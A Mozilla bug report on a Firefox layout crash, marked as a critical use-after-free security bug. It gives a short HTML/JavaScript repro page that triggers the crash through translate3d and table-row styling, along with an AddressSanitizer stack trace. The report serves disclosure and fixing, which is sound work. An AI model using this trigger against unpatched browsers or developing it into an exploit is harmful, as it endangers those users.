Closed Bug 830924 Opened 12 years ago Closed 12 years ago

segfault with translate3d

Categories

(Core :: Layout, defect)

Product:
Core
Component:
Layout
Platform:
x86
Linux
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 830192
Tracking Flags:
Tracking Status
firefox19 --- unaffected
firefox20 --- fixed
firefox21 --- fixed
firefox-esr17 --- unaffected
b2g18 --- unaffected

People

(Reporter: miaubiz, Unassigned)

Details

(4 keywords, Whiteboard: [sg:dupe 830192])

Attachments

(2 files)

repro case
649 bytes, text/plain
Details
asan log linux
5.38 KB, text/plain
Details
Attached file repro case
when I load: <html> <head> <style> #el0 { display: table-row; -moz-transform:translate3d(0,0,0); } #el8 { position: fixed; } </style> <script> onload = function() { el0=document.createElement('div') el0.setAttribute('id','el0') document.body.appendChild(el0) el0.appendChild(document.createElement('div')) el8=document.createElement('div') el0.appendChild(el8) el0.appendChild(document.createElement('div')) document.body.offsetTop el8.setAttribute('id','el8') } </script> </head> <body> </body> </html> I get: ================================================================= ==17691== ERROR: AddressSanitizer crashed on unknown address 0x120000000000 (pc 0x7fffecb9a14f sp 0x7fffffff7240 bp 0x7fffffff7390 T0) AddressSanitizer can not provide additional info. #0 0x7fffecb9a14e in nsIFrame::GetNextInFlow() const /builds/slave/try-lnx64/build/layout/generic/nsIFrame.h:1510 #1 0x7fffecf56a7f in nsCellMap::GetRowSpanForNewCell(nsTableCellFrame*, int, bool&) const /builds/slave/try-lnx64/build/layout/tables/nsCellMap.cpp:2082 #2 0x7fffecf568c8 in nsTableCellMap::AppendCell(nsTableCellFrame&, int, bool, nsIntRect&) /builds/slave/try-lnx64/build/layout/tables/nsCellMap.cpp:562 #3 0x7fffecfb4ddf in nsTableRowFrame::AppendFrames(mozilla::layout::FrameChildListID, nsFrameList&) /builds/slave/try-lnx64/build/layout/tables/nsTableRowFrame.cpp:184 depending on the styles the segfault is at different addresses.
Attached file asan log linux
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Group: core-security
status-b2g18: --- → unaffected
status-firefox19: --- → unaffected
status-firefox20: --- → fixed
status-firefox21: --- → fixed
status-firefox-esr17: --- → unaffected
Keywords: crash, csec-uaf, sec-critical, testcase
Whiteboard: [sg:dupe 830192]
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: